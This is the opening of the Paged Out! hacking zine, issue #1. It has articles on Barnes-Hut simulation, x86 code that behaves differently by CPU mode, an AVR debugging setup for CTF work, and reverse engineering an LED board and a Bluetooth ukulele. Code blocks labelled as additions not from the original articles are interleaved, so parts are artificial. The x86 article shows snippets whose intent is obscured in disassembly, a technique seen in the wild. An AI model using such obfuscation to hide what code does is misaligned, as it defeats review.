Paged Out! Institute
https://pagedout.institute/

Project Lead: Gynvael Coldwind
Executive Assistant: Arashi Coldwind
DTP Programmer: foxtrot_charlie
DTP Advisor: tusiak_charlie
Lead Reviewers: Mateusz "j00ru" Jurczyk, KrzaQ
Reviewers: kele, disconnect3d

We would also like to thank:
Artist (cover): ReFiend (deviantart.com/refiend)
Additional Art: cgartists (cgartists.eu)
Templates: Matt Miller, wiechu, Mariusz "oshogbo" Zaborski
Issue #1 Donators: Mohamed Saher (halsten)

If you like Paged Out!, let your friends know about it!

Paged Out! is what happens when a technical reviewer sees too many 20-page long programming articles in a short period of time. Though that's only part of the story. The idea of an experimental zine focusing on very short articles spawned in my mind around a year ago and was slowly — almost unconsciously — developing in my head until early 2019, when I finally decided that this whole thing might actually work (even given my chronic lack of time).

Why short articles in the first place, you ask? They are faster to read, faster to write, faster to review, and it's fully acceptable to write a one-pager on this one cool trick you just used in a project / exploit. Furthermore, as is the case with various forms of constraint programming and code golfing, I believe adding some limitations might push one to conjure up interesting tricks while constructing the article (especially if the author has almost full control of the article's layout) and also, hopefully, increase the knowledge-to-space ratio.

Giving authors freedom to arrange the layout as they please has interesting consequences by itself. First of all, we can totally dodge a standard DTP process - after all, we get PDFs that already use the final layouts and can be merged into an issue with just a set of scripts (therefore our Institute has a DTP Programmer instead of a DTP Artist). Secondly, well, every article looks distinctly different — this is the reason I say our project is "experimental" — because nobody can predict whether this artistic chaos of a magazine will get accepted by our technical community. And thirdly, merging PDFs is a pretty interesting technical challenge by itself - and even though I fully believe in our DTP Programmer, I do realize it might take a few issues to get an optimal PDF.

As for the variety of topics in our zine - programming, hacking, gamedev, electronics, OS internals, demoscene, radio, and so on, and so forth - what can I say, I just wrote down the areas I personally find fascinating, enchanting and delightful.

To finish up, I would like to wish our readers an enjoyable experience with the first issue of the free Paged Out! zine. And in case you have any feedback, please don't hesitate to email gynvael@pagedout.institute.

Gynvael Coldwind
Project Lead

Legal Note
This zine is free! Feel free to share it around.
Licenses for most articles allow anyone to record audio versions and post them online — it might make a cool podcast or be useful for the visually impaired.
If you would like to mass-print some copies to give away, the print files are available on our website (in A4 and US Letter formats, 300 DPI).
If you would like to sell printed copies, please contact the Institute.
When in legal doubt, check the given article's license or contact us.
Dearest neighbors,


In 19th century America, there were books made specifically for the frontiersman who couldn't carry a library. The idea was that if you were setting out to homestead in the wild blue yonder, one properly assembled book could teach you everything you needed to know that wasn't told in the family bible. How to make ink from the green husks around walnuts, how to grow food from wild seeds, and how to build a shelter from scruffy little trees when there's not yet time to fell hardwood. You might even learn to make medicines, though I'd caution against any recipes involving nightshade or mercury.

Now that the 21st century and its newfangled ways 
are upon us, the fine folks at No Starch Press have seen 
fit to print the collected works of The International 
Journal of Proof of Concept or Get the Fuck Out—our 
first fourteen releases—in two classy tomes, bound in 
the finest faux leather, on over fifteen hundred pages 
of thin paper, with ribbons to keep your place while 
studying. You will see practical examples of how to 
write exploits for ancient and modern architectures, 
how to patch emulators to prototype hardware back- 
doors that would be beyond a hobbyist’s budget, and 
how to break bad cryptography. You will learn more 
about file formats than you ever believed possible, and 
a little about how to photograph microchips and circuit 
boards for reverse engineering. 

This fine collection was carefully indexed and cross- 
referenced, with twenty-four full color pages of Ange 
Albertini’s file format illustrations to help understand 
our polyglots. But above all else, beyond the nifty 
tricks and silly songs, these books exist to remind you 
what a clever engineer can build from a box of parts 
with a bit of free time. Not to show you what others 
have done, but to show you how they did it so that you 
can do the same. 


Your neighbor, 
Pastor Manul Laphroaig 
Use discount code APATIROFPOC for 40% off of both volumes.
Algorithmics

Accelerating simulations by clustering bodies using the Barnes-Hut algorithm


Simulating forces such as gravity is a demanding task, because of the interactions every object has with all the other objects. With n objects, there are n - 1 forces acting on each body, so all in all, there are n · (n - 1) forces acting. The Barnes-Hut algorithm can be used to approximate the forces that need to be calculated by clustering the objects, sacrificing accuracy. In order to take those clusters into effect, the algorithm takes the size of the individual clusters and their distance to the respective object into account.
Figure 1: A cluster of stars that is far enough away from a single star can be abstracted as a single point in space.


(1)

The above equation describes how to cluster the objects. If a body is far away from a small cluster (r >> d), θ gets very small and the cluster in which the body is located can be abstracted to a single point. 0 < θ < 1 is provided by the user as a threshold impacting the accuracy and the speed of the simulation. Its value should be tuned depending on the given data, as it decides which stars are approximated as a single cluster.

Everything is based on the stars being in a tree, so 
we need to subdivide the space into cells. Such a subdi- 
vision can be seen in Figure 2a and the process can be 
seen on the bottom of this page. 

When calculating the forces affecting the object F in Figure 2a, the Barnes-Hut algorithm does not consider all objects individually, but only the ones that fall over the threshold θ. For the object F, this means that the objects B and C are not calculated independently, but as a single object (a new abstract object is created in the center of gravity of B and C).
[Figure (bottom of page), first panels: "We start with an empty space", "We insert the star A".]

https://github.com/hanemile
https://twitter.com/hanemile
(a) Cell representation
(b) Tree representation

Figure 2: Visual representations of the same Barnes-Hut tree. (http://arborjs.org/docs/barnes-hut)


The tree in Figure 2b describes the cells from Figure 2a - top left, top right, bottom left and bottom right are depicted as a new layer in the tree accordingly. While building the tree, we are going to store the center of gravity and the total mass of each inner node. The complete process of simulating the force acting on a single star works in the following way:

We walk through the tree starting from the root in the direction of the leaves, using a < θ as the end condition. We use θ as a threshold for controlling how many forces to take into account (0 < θ < 1). The force acting on a star is calculated when a leaf is reached or when the end condition is met (thus resulting in no further recursion into the tree from that node on).

Experimenting with the value of θ on the dataset can optimize the runtime from O(n²) to as low as O(n · log(n)). This means that if we've got 2 · 10^8 bodies and can calculate the forces acting on 10^6 bodies per second, the total runtime is reduced from about 1200 years down to 45 minutes optimally (the time to build the tree is an actual computational complexity (O(n · log(n))), not a measured runtime, and does not depend on θ).

This principle can also be applied to other types of 
problems such as simulating molecules. If you come to 
do something with it, don’t mind writing to me! 


@hanemile on most platforms. 


[Figure (bottom of page), remaining panels: "Inserting B: Subdivide, shift A, shift B from root", "Inserting C: Subdivide, shift A, shift C from root".]
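The tree construction and the θ-controlled walk described above, as an added example that is not part of the original article: a small 2-D quadtree with insertion by subdivision (the "shift A, shift B" steps), per-node mass and center of gravity, and a force walk that stops when cell size / distance falls below θ. It also carries a brute-force reference so the accuracy/speed trade-off can be measured; G, the softening constant eps and the random bodies are assumptions.

```python
import math
import random

class Cell:
    """A square cell of the quadtree. A leaf holds at most one body; an inner
    cell holds four children plus the total mass and centre of gravity of
    everything below it, which is what the force walk uses."""

    def __init__(self, x, y, size):
        self.x, self.y, self.size = x, y, size   # lower-left corner and width
        self.body = None
        self.children = None
        self.mass = 0.0
        self.cx = self.cy = 0.0

    def _child_for(self, b):
        half = self.size / 2
        if self.children is None:                # subdivide on first use
            self.children = [Cell(self.x + i * half, self.y + j * half, half)
                             for j in (0, 1) for i in (0, 1)]
        col = 1 if b[0] >= self.x + half else 0
        row = 1 if b[1] >= self.y + half else 0
        return self.children[row * 2 + col]

    def insert(self, b):
        """b = (x, y, mass). An occupied leaf is subdivided and its old body
        shifted down, as in the 'Inserting B / Inserting C' panels."""
        total = self.mass + b[2]                 # running centre of gravity
        self.cx = (self.cx * self.mass + b[0] * b[2]) / total
        self.cy = (self.cy * self.mass + b[1] * b[2]) / total
        self.mass = total
        if self.children is None and self.body is None:
            self.body = b
            return
        if self.body is not None:
            old, self.body = self.body, None
            self._child_for(old).insert(old)
        self._child_for(b).insert(b)

def build_tree(bodies, size):
    root = Cell(0.0, 0.0, size)
    for b in bodies:
        root.insert(b)
    return root

def accel(body, node, theta, eps=1e-3):
    """Acceleration on `body` (G = 1) from everything in `node`, plus the
    number of interactions evaluated. Recursion stops at a leaf or when the
    cell is small and far enough away: size / distance < theta."""
    if node.mass == 0 or node.body is body:
        return 0.0, 0.0, 0
    dx, dy = node.cx - body[0], node.cy - body[1]
    r = math.hypot(dx, dy)
    if r == 0.0:
        return 0.0, 0.0, 0
    if node.children is None or node.size / r < theta:
        f = node.mass / ((r * r + eps) * r)      # softened 1/r^2, times dx/r
        return f * dx, f * dy, 1
    ax = ay = 0.0
    n = 0
    for child in node.children:
        cax, cay, cn = accel(body, child, theta, eps)
        ax, ay, n = ax + cax, ay + cay, n + cn
    return ax, ay, n

def brute_force(body, bodies, eps=1e-3):
    """Exact O(n) sum over all other bodies, for comparison."""
    ax = ay = 0.0
    for o in bodies:
        if o is body:
            continue
        dx, dy = o[0] - body[0], o[1] - body[1]
        r = math.hypot(dx, dy)
        f = o[2] / ((r * r + eps) * r)
        ax, ay = ax + f * dx, ay + f * dy
    return ax, ay

def compare(n=300, theta=0.5, seed=7):
    """Mean relative error of the Barnes-Hut result and mean interactions per
    body, for `n` constructed random bodies in the unit square."""
    rnd = random.Random(seed)
    bodies = [(rnd.random(), rnd.random(), 0.5 + rnd.random()) for _ in range(n)]
    tree = build_tree(bodies, 1.0)
    err = interactions = 0.0
    for b in bodies:
        ax, ay, k = accel(b, tree, theta)
        bx, by = brute_force(b, bodies)
        err += math.hypot(ax - bx, ay - by) / math.hypot(bx, by)
        interactions += k
    return err / n, interactions / n

if __name__ == '__main__':
    for theta in (0.0, 0.3, 0.5, 0.8):
        print('theta =', theta, '-> (mean rel. error, interactions/body) =', compare(theta=theta))
```

With θ = 0 the walk degenerates to the exact n - 1 interactions per body; raising θ trades a growing error for fewer evaluated interactions.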
Multi-bitness x86 code

Tomasz Grysztar
tgrysztar@flatassembler.net

I first needed a trick of this kind nearly 20 years ago, when I was working on a variant of unreal mode that allowed for 32-bit code segments. I wanted a common interrupt table that would not need rewriting back and forth, so my interrupt handlers had to detect if CS was a 32-bit segment and in that case switch back to regular real mode before calling the original vector (a 16-bit BIOS or DOS service). The snippet I used looked like:

    hex         use16               use32
    3D 77 77    cmp ax,7777h        cmp eax,0??EB7777h
    EB ??       jmp already16bit

When an interrupt happens, the flags get stored on the stack, so it was not a big deal that CMP altered a few of them.

I thought this was a fun solution, but then I found out that it was actually possible to move the IDT base in real mode, which made this trick obsolete.

Not long after, I was learning of the then-upcoming x86-64 architecture (an official name at the time) and I noticed that 32-bit instructions were mostly encoded the same in the new mode. Only things like addresses and stack elements were promoted to 64-bit automatically, other sizes stayed as they were unless a REX prefix was used. It stirred my imagination and made me believe that perhaps some existing machine code could run correctly in a 64-bit segment without any alterations. Later I realized that many small obstacles made it not really viable in general, though certainly possible for some small snippets, like this one that converts slashes to backslashes in a UCS-2/UTF-16 string at ESI/RSI:

    hex                   use32                   use64
    56                    push esi                push rsi
                          convert:                convert:
    66 AD                 lods word [esi]         lods word [rsi]
    66 85 C0              test ax,ax              test ax,ax
    74 0E                 jz done                 jz done
    66 83 F8 2F           cmp ax,'/'              cmp ax,'/'
    75 F3                 jne convert             jne convert
    66 C7 46 FE 5C 00     mov word [esi-2],'\'    mov word [rsi-2],'\'
    EB EB                 jmp convert             jmp convert
                          done:                   done:
    5E                    pop esi                 pop rsi

I never really needed a variant of my trick that would distinguish 64-bit mode from the 32-bit one. But years later I learned that there are sightings of similar contrivances in the wild, even if made for purposes much different than mine. It made me think about upgrading my own snippet. In 64-bit mode a CMP instruction is still 32-bit by default, so I could not simply reuse the old method. I came up with this one:

    hex         use64               use32
    67 8D 06    lea eax,[esi]       lea eax,[word 0??EBh]
    EB ??       jmp is64bit

This one does not touch any flags, but trashes EAX. It can be changed to use another register, but it always needs to sacrifice one.

Modern processors also got a new opcode that enables a completely transparent variant:

    hex           use64               use32
    67 0F 1F 06   nop [esi]           nop [word 0??EBh]
    EB ??         jmp is64bit

The operand of this instruction is decoded but nothing more is done with it. The address does not have to be valid.

It might even be made into a three-way switch, for an unlikely occurrence that the code might get executed in 16-bit mode (why would you ever need to tell 16-bit mode from 64-bit one? I don't know!):

    hex           use64
    67 0F 1F 06   nop [esi]
    EB ??         jmp short not32bit
                  ; 32-bit mode detected...
                  not32bit:
    0F 1F 06      nop [rsi]
    EB ??         jmp short is64bit
                  ; 16-bit mode detected...
                  is64bit:
                  ; 64-bit mode detected...

As a bonus, here comes another three-way detector that simply does not care about preserving flags or registers. What makes it interesting is perhaps that its intent is obscured when only looking at 64-bit disassembly. But after reading this you might not get fooled anymore!

    hex         use16               use32                  use64
    48          dec ax              dec eax                mov rax,0??EB??EB??EB??EBh
    B8 EB ??    mov ax,0??EBh       mov eax,0??EB??EBh
    EB ??       jmp is16bit
    EB ??       jmp is32bit         jmp is32bit
    EB ??       jmp unreachable     jmp unreachable

The extra copies of 0EBh that never get executed serve no real purpose, they just complete a nice pattern.

https://flatassembler.net
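To see why the same bytes split into different instructions per mode, here is an added example (not the article's code, and not a general disassembler): a decoder for only the opcodes the snippets use, parameterised by default operand and address size, the 66h/67h prefixes and REX. It is assumed that the article's "??" displacement bytes are 10h and that the snippets are viewed from their first byte.

```python
# Added example: decode the article's byte patterns as a 16-, 32- or 64-bit
# segment would execute them.  Supported: 66h/67h prefixes, REX (64-bit mode
# only), cmp (e)ax,imm (3D), mov (e/r)ax,imm (B8), dec (48, legacy modes),
# lea r32,mem (8D), multi-byte nop (0F 1F /0) and jmp short (EB).

# mode -> (default operand size, default address size)
DEFAULTS = {16: (16, 16), 32: (32, 32), 64: (32, 64)}
ACC = {16: 'ax', 32: 'eax', 64: 'rax'}

def modrm_memory(code, i, asz):
    """Decode a mod=00 ModRM memory operand for the given address size.
    rm=110 means [disp16] with 16-bit addressing but [esi]/[rsi] otherwise,
    which is the whole point of the 67h-prefixed tricks above."""
    modrm = code[i]; i += 1
    mod, rm = modrm >> 6, modrm & 7
    if mod != 0 or rm == 4:
        raise NotImplementedError('only the simple mod=00 forms are needed here')
    if asz == 16:
        if rm == 6:
            disp = int.from_bytes(code[i:i + 2], 'little')
            return f'[word 0x{disp:04X}]', i + 2
        return '[' + ['bx+si', 'bx+di', 'bp+si', 'bp+di', 'si', 'di', '', 'bx'][rm] + ']', i
    if rm == 5:
        disp = int.from_bytes(code[i:i + 4], 'little')
        return f'[dword 0x{disp:08X}]', i + 4
    reg = ['ax', 'cx', 'dx', 'bx', '', '', 'si', 'di'][rm]
    return f"[{'e' if asz == 32 else 'r'}{reg}]", i

def decode(code: bytes, mode: int):
    """Return [(offset, length, mnemonic), ...] for `code` run in `mode`."""
    out, i = [], 0
    while i < len(code):
        start = i
        osz, asz = DEFAULTS[mode]
        rex_w = False
        while True:                                  # legacy prefixes, then REX
            b = code[i]
            if b == 0x66:
                osz = 16 if osz == 32 else 32; i += 1
            elif b == 0x67:
                asz = {16: 32, 32: 16, 64: 32}[asz]; i += 1
            elif mode == 64 and 0x40 <= b <= 0x4F:  # REX is a prefix only in 64-bit mode
                rex_w = bool(b & 8); i += 1
                break
            else:
                break
        if rex_w:
            osz = 64
        op = code[i]; i += 1
        acc = ACC[osz]
        if op == 0x0F and code[i] == 0x1F:           # multi-byte NOP with operand
            mem, i = modrm_memory(code, i + 1, asz)
            mn = f'nop {mem}'
        elif op == 0x8D:
            mem, i = modrm_memory(code, i, asz)
            mn = f'lea {acc},{mem}'
        elif op == 0x3D:                             # cmp acc,imm16/imm32
            n = 2 if osz == 16 else 4
            imm = int.from_bytes(code[i:i + n], 'little'); i += n
            mn = f'cmp {acc},0x{imm:X}'
        elif op == 0xB8:                             # mov acc,imm (imm64 with REX.W)
            n = osz // 8
            imm = int.from_bytes(code[i:i + n], 'little'); i += n
            mn = f'mov {acc},0x{imm:X}'
        elif op == 0x48:                             # only reached outside 64-bit mode
            mn = f'dec {acc}'
        elif op == 0xEB:
            rel = int.from_bytes(code[i:i + 1], 'little', signed=True); i += 1
            mn = f'jmp short {i + rel}'              # target as offset into the snippet
        else:
            raise NotImplementedError(f'opcode {op:02X}')
        out.append((start, i - start, mn))
    return out

def mnemonics(code, mode):
    return [m for _, _, m in decode(code, mode)]

# Constructed from the article's tables, with the "??" bytes set to 10h.
CMP_SNIPPET = bytes.fromhex('3D7777EB10')          # cmp ax,7777h / jmp vs cmp eax,imm32
LEA_SNIPPET = bytes.fromhex('678D06EB10')          # lea eax,[esi] / jmp vs lea eax,[word]
NOP_SNIPPET = bytes.fromhex('670F1F06EB10')        # nop [esi] / jmp vs nop [word]
MOV_SNIPPET = bytes.fromhex('48B8EB10EB10EB10EB10')  # mov rax,imm64 vs dec/mov/jmp/jmp

if __name__ == '__main__':
    for name, snip in [('cmp', CMP_SNIPPET), ('lea', LEA_SNIPPET),
                       ('nop', NOP_SNIPPET), ('mov', MOV_SNIPPET)]:
        for mode in (16, 32, 64):
            print(f'{name} use{mode}: ' + ' ; '.join(mnemonics(snip, mode)))
```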


[Screenshot: gdb-dashboard attached to simavr, stopped at 0x0000007a (Output/messages, Assembly, Stack and Threads panes).]

AVR debug env for CTF and profit? Nah...


I recently came across some CTF challenges based on Arduino/ATmega bin/Intel HEX. I lost some time in setting up a debug environment, so I'd like to share here my quick installation guide.


1) I don't have a board... damn... OK, I'll go with software

If you don't have a board with a JTAG or similar interface, 
the easiest way is to go with software: 
https://github.com/buserror/simavr 


Quick installation guide: 
(requires avr-gcc, avr-libc, freeglut3-dev) 


# git clone https://github.com/buserror/simavr 
# cd simavr 
# make 


The only trick here is how to run it: 


#./examples/board_simduino/obj-x86_64-linux-gnu/simduino.elf -d 
<path_to_hex_file> 


Now you have a sketch file started and waiting on 
instruction address 0, with a GDB port (port 1234). 


2) OK, and now? How can | attach a debugger? 


You need to use an avr-gdb debugger. The problem is 
that with most of the distros, this is not coming with 
Python support enabled, so you can’t have a decent 
interface. 

I used Dashboard (https://github.com/cyrus-and/gdb-dashboard). See screen on top.


To get a working copy with Python extension | grabbed 
the scripts at: 
https://github.com/igormiktor/build-avr-gcc 

then modified the script build-avr-gdb. 


https://github.com/cecio/


Modify line: 

../$NAME_GDB/configure --prefix=$PREFIX -target=avr 

Add Python support: 

../$NAME_GDB/configure --prefix=$PREFIX --with-python -target=avr 


Then run the script: it should automate most of the 
things for you. At the end, if you installed the Dashboard 
GDB interface, you'll have your shiny debugger ready to 
be used in: 


/usr/local/avr/bin/avr-gdb 


Remember to review the log file in case of errors: for example I missed a "missing package" error for "texinfo" the first time.


3) but... but... GDB behaves in a strange way... 


So, quick cheat sheet for the avr-gdb. To connect to the 
running simavr: 


(gdb) target remote localhost:1234 


Remember that the program is stopped, so if you want to run it, just type "c" to continue.


To review the memory allocation: 
(gdb) info mem 


You usually see that the FLASH is allocated at 
0x00000000 and the SRAM at 0x00800000. Here a tricky 
part: if you set a breakpoint the usual way (with 
command b *0x00000101), it will be placed in SRAM... so 
not very useful. If you want to place it in FLASH, you 
have to use the following syntax: 


(gdb) b *(void(*)()) 0x00000101 


OK, so you are ready to debug and find your next flag... 


happy hacking!

Cesare "redSheep" Pizzi
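The three steps above collected into one script, as an added example that is not the article's code: it generates the avr-gdb command file (attach to simavr, list the memory map, set FLASH breakpoints with the function-pointer cast, continue) and can launch simduino and avr-gdb with it. Paths are the article's; the firmware file name and the breakpoint addresses are placeholders.

```python
# Added example (not from the article).  The simduino and avr-gdb paths are
# the ones the article uses; everything else is an assumption.
import subprocess
import sys
from pathlib import Path

SIMDUINO = './examples/board_simduino/obj-x86_64-linux-gnu/simduino.elf'
AVR_GDB = '/usr/local/avr/bin/avr-gdb'
GDB_PORT = 1234
FLASH_BASE = 0x00000000   # as reported by "info mem"
SRAM_BASE = 0x00800000

def flash_breakpoint(addr: int) -> str:
    """A bare 'b *ADDR' is taken as a data address and lands in SRAM, so a
    code breakpoint casts the address to a function pointer instead."""
    return f'b *(void(*)()) 0x{addr:08x}'

def sram_address(offset: int) -> int:
    """gdb's view of a data-space offset (SRAM is mapped at 0x00800000)."""
    return SRAM_BASE + offset

def gdb_commands(flash_addrs, port=GDB_PORT) -> list:
    """Command sequence for a fresh simavr session (stopped at address 0)."""
    cmds = [f'target remote localhost:{port}', 'info mem']
    cmds += [flash_breakpoint(a) for a in flash_addrs]
    cmds.append('c')          # the sketch is stopped; continue to the first breakpoint
    return cmds

def write_script(path, flash_addrs):
    Path(path).write_text('\n'.join(gdb_commands(flash_addrs)) + '\n')
    return path

def debug(hex_file, flash_addrs, script='avr-ctf.gdb'):
    """Start simduino on the hex file, then attach avr-gdb with the script."""
    sim = subprocess.Popen([SIMDUINO, '-d', hex_file])
    try:
        subprocess.call([AVR_GDB, '-x', write_script(script, flash_addrs)])
    finally:
        sim.terminate()

if __name__ == '__main__':
    # usage: script.py challenge.hex 0x101 0x20a   (placeholder addresses)
    debug(sys.argv[1], [int(a, 0) for a in sys.argv[2:]])
```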


chubby75

Ever needed a cheap FPGA board to just throw into a project somewhere? Are you bothered by the fact that the most GPIO you usually get is a measly Arduino header? Look no further!

Chubby75 is an effort to reverse engineer an LED panel controller board (identified RV901T, available on Aliexpress for around $20), that just happens to contain:

- a Spartan 6 LX15 FPGA
- 2x Gigabit Ethernet with PHYs
- 8MBytes of SDRAM
- over 70 5V GPIOs


We provide extensive documentation to turn this board 
into an FPGA development board for education and 
research. And, given enough effort, you might even be able 
to write a proper open source stack for controlling LED 
panels! 

We also provide support for Migen/MiSoC/LiteX, so you 
can define your digital logic in Python. To blink an LED 
run the following Python code in the Chubby75 git 
checkout: 


    from migen import *

    class Top(Module):
        def __init__(self, platform):
            # Single clock domain from external oscillator.
            osc = platform.request('clk25')
            self.clock_domains.cd_sys = ClockDomain()
            self.comb += self.cd_sys.clk.eq(osc)
            # Blink that LED.
            led = platform.request('user_led')
            counter = Signal(max=25000000)
            self.sync += \
                If(counter == 0,
                    counter.eq(25000000),
                    led.eq(~led),
                ).Else(
                    counter.eq(counter - 1)
                )

    # Instantiate and build for RV901T.
    from platform import Platform
    p = Platform()
    t = Top(p)
    p.build(t)

    # Program over JTAG with xc3sprog and a Xilinx Platform Cable.
    import migen.build.xilinx.programmer as prgs
    prog = prgs.XC3SProg('xpc')
    prog.load_bitstream('build/top.bit')


Don't forget! Using LiteX allows you to quickly integrate 
support for Ethernet (via LiteEth), and SDRAM (via 
LiteDRAM). And, if you want a soft core, this FPGA will 
easily fit a Lattice LM32 and a bunch of picorv32 RISC-V 
cores! In the repository, you'll find a working example of 
SDRAM + LM32 running C code. 

Right now you will still need Xilinx's ISE suite to develop 
for this board. However, there are efforts to bring an open 
source toolchain to Spartan 6 FPGAs, so keep your eyes 
peeled! 


q3k 
github.com/q3k/chubby75 (repository licensed under CC-0)

[Photo caption fragment: "...controller into an FPGA devboard!"]


You might be wondering - how do you document a 4 layer 
PCB and get a full pinout of all the connectors? 


We started by finding JTAG on the board. Thankfully, it's 
marked on the silkscreen, so we just had to scrape the 
soldermask off and solder to it. With that, we could start 
running our own bitstreams on the board. But how do we 
even know where a clock or an LED is? 


We ended up taking a brute force approach. One board 
was fully depopulated, sanded, and photos were taken of 
every layer. This allowed us to understand some things 
about how the PHYs and SDRAM are connected, and how 
to control the I/O buffers on the board. We post processed 

the photos of the layers in GIMP and then layered them in 
Inkscape, so that we could trace and label things as we 
discovered them. 


Once we had a general idea of how things worked, we wrote a little piece of Migen code to take all unknown pads of the FPGA and make them output their identifier as a repeated ASCII string via UART. Using this, we could just probe the two large connectors on board with a USB to UART adapter to immediately know what pin of the FPGA drove what pin of the connector.
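The pad-identification trick modelled at the bit level, as an added example that is not chubby75's Migen code: each pad is modelled as a UART transmitter (8N1) repeating its own name, and the receiving side is modelled the way the USB-to-UART adapter sees it, including attaching the probe in the middle of a frame. The baud rate and pad names are assumptions.

```python
# Added example (not from the chubby75 repository).  Pure-Python model of
# what the Migen module drives on each pad and what the adapter decodes.

SYS_CLK = 25_000_000       # the board's 25 MHz oscillator, as in the blink example
BAUD = 115200              # assumed adapter setting
CYCLES_PER_BIT = SYS_CLK // BAUD

def uart_frame(byte):
    """8N1 framing: start bit (0), eight data bits LSB first, stop bit (1)."""
    return [0] + [(byte >> n) & 1 for n in range(8)] + [1]

def pad_bitstream(pad_name, repeats=3):
    """The bit sequence a pad drives: its name plus newline, over and over."""
    bits = []
    for ch in ((pad_name + '\n') * repeats).encode('ascii'):
        bits += uart_frame(ch)
    return bits

def line_levels(bits, cycles_per_bit=CYCLES_PER_BIT):
    """Stretch each bit over the clock cycles it is held on the wire."""
    return [b for b in bits for _ in range(cycles_per_bit)]

def decode_uart(levels, cycles_per_bit=CYCLES_PER_BIT):
    """Receive like a UART adapter: on a falling edge sample the centre of
    each bit; a bad stop bit means a false start, so slide and resync."""
    out = bytearray()
    i = 0
    while i < len(levels):
        if levels[i] == 1:                 # idle or stop level
            i += 1
            continue
        centre = i + cycles_per_bit // 2
        stop = centre + 9 * cycles_per_bit
        if stop >= len(levels):
            break                          # incomplete trailing frame
        if levels[stop] != 1:
            i += 1                         # framing error: resync
            continue
        byte = 0
        for n in range(8):
            byte |= levels[centre + (n + 1) * cycles_per_bit] << n
        out.append(byte)
        i = stop + cycles_per_bit // 2     # move past the stop bit
    return out.decode('ascii', 'replace')

def identify_pad(levels, cycles_per_bit=CYCLES_PER_BIT):
    """Name of the pad driving a probed line: the most common complete line
    of text, ignoring the possibly truncated first and last ones."""
    lines = decode_uart(levels, cycles_per_bit).split('\n')[1:-1]
    return max(set(lines), key=lines.count) if lines else None

if __name__ == '__main__':
    # constructed pad name; the probe is attached part-way through a frame
    wire = line_levels(pad_bitstream('P1_12'))
    print(identify_pad(wire[CYCLES_PER_BIT * 7 + 40:]))
```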


Chubby75 is a collaboration brought to you by: 


Niklas Fauth, Jan Henrik, q3k, carrotIndustries, 
enjoydigital, jeanthom, informatic and many others. 


twitter.com/q3k 


HACKULELE 


Because all things got to be smart, China gifted us with a 
Smart-Ukulele called Populele. 


The point is to use a bloated, kind of ugly app to connect 
to your uke over bluetooth, sending commands to blink 
the lights behind the frets. The app gamifies the learning 
process, has songbooks and stuff, but as all “smart” things 
go, everyone on the App’s page complains about unreli- 
able BT connection, bugs, etc. 


CLOSER LOOK AT THE SMART 


The “smart” part is easy to pull off from inside the instru- 
ment and reveals a boardy board, a lipo-y lipo, and cabley 
cables to connect to the blinky blink side. 


[Board photo: SGKJ-UKP-V04, with pads labelled 3.3V, BAT, RX, TX.]


Main chip there is a Dialog DA14580. Unfortunately, according to my logic analyzer, both TX/RX (for serial) & SDIO/SCK (for JTAG) aren't active: no easy hacking for me :'( I couldn't get any intel on the tiny thing on the side that's marked 5F2 A71 TOG.


BLE SNIFFING 


I use the NRF52 devkit by Nordic to sniff the BLE traffic. The output is verbose, the uke sends multiple heartbeats per second, for some reason, probably to drain the battery faster.


The Uke's LED matrix state is set by a 19 byte packet sent to a GATT service (attribute handle 0x0024, UUID is 0000DC86-0000-1000-8000-00805F9B34FB). 3 bytes per string (G, C, E and A) are sent to set 18 LEDs (only the 18 MSB are used) as so:

    F1 AA AA AA EE EE EE CC CC CC GG GG GG 00 00 00 00 00 00

The bluez.py script will let you send these packets through BlueZ.


https://github.com/furikuda/hackulele 
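A builder and parser for the 19-byte LED packet above, as an added example that is not part of the hackulele repository (it only produces and checks the bytes; sending stays with bluez.py). The bit order inside each 3-byte group is an assumption: fret 0 is the most significant bit, and only the 18 most significant bits of the 24 are used, as the article states.

```python
# Added example (not from the hackulele repository).  Group order after the
# 0xF1 header follows the article's layout: A, E, C, G.
STRINGS = ('A', 'E', 'C', 'G')
LEDS_PER_STRING = 18
HEADER = 0xF1

def string_mask(frets) -> int:
    """24-bit group value with the given frets lit (fret 0 = MSB, assumed)."""
    mask = 0
    for f in frets:
        if not 0 <= f < LEDS_PER_STRING:
            raise ValueError(f'fret {f} out of range')
        mask |= 1 << (23 - f)
    return mask

def build_packet(lit: dict) -> bytes:
    """lit maps string name -> iterable of fret numbers; unknown keys rejected."""
    unknown = set(lit) - set(STRINGS)
    if unknown:
        raise ValueError(f'unknown strings: {sorted(unknown)}')
    body = b''.join(string_mask(lit.get(s, ())).to_bytes(3, 'big') for s in STRINGS)
    return bytes([HEADER]) + body + bytes(6)      # six trailing zero bytes

def parse_packet(pkt: bytes) -> dict:
    """Inverse of build_packet; validates length, header and the unused bits."""
    if len(pkt) != 19 or pkt[0] != HEADER:
        raise ValueError('not a 19-byte LED packet')
    if any(pkt[13:]):
        raise ValueError('trailing bytes must be zero')
    lit = {}
    for n, s in enumerate(STRINGS):
        group = int.from_bytes(pkt[1 + 3 * n:4 + 3 * n], 'big')
        if group & 0x3F:                           # the 6 LSB carry no LED
            raise ValueError(f'string {s}: only the 18 MSB may be set')
        lit[s] = [f for f in range(LEDS_PER_STRING) if (group >> (23 - f)) & 1]
    return lit

if __name__ == '__main__':
    pkt = build_packet({'A': [0], 'C': [17], 'G': [1, 2]})   # constructed
    print(pkt.hex(' '))
    print(parse_packet(pkt))
```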


Hackulele 


INSIDE THE FRETBOARD 


Hooking up your logic analyzer on SDA/SCL you get a few of the I2C commands sent at boot time to the IS31FL3731 chip (address 0x74):

    74 FD 0B
    74 08
    74 0A 00
    74 08
    74 00 FF
    74 08
    74 02 FF
    74 08
    74 04 FF
    74 08
    74 08 FF
    74 08
    74 0A FF
    74 08
    74 0C FF
    74 08
    74 90 55
    74 08
    74 92 55
    74 08
    74 93 55

No idea why the chip sends all these 0x08 commands, as they are nowhere in the IS31 doc, trying to fix weird timing issues maybe? Or just sloppy coding?

I just ignored them and wrote a CircuitPython lib to talk to the LED matrix (main.py). The annoying part was finding what LED address corresponded to where on the fretboard.

To connect to the LED matrix, pull SCL & SDA up with a 4.7K resistor, ground INT, and set SDB as an 'enable' pin. The 5V VCC will need more than 50mA, so don't use an arduino GPIO.

    FEMALE/UKE SIDE
    | 5V   GND  SCL |
    | SDB  INT  SDA |

You now get full control of the LEDs PWM and super fast animation update without the painful BLE setup.

ANIMATIONS!

The library on the repo uses separate 'Animator' objects to update the internal LED state. It is heavily influenced by the Best Badge Ever (2018 DCFurs badge). Both the CircuitPython main.py and BlueZ bluez.py scripts use the same Animator objects. See animations/scroll.py for an example.

MORE INFO

Link to repo with more info, resources and docs: https://github.com/Furikuda/hackulele

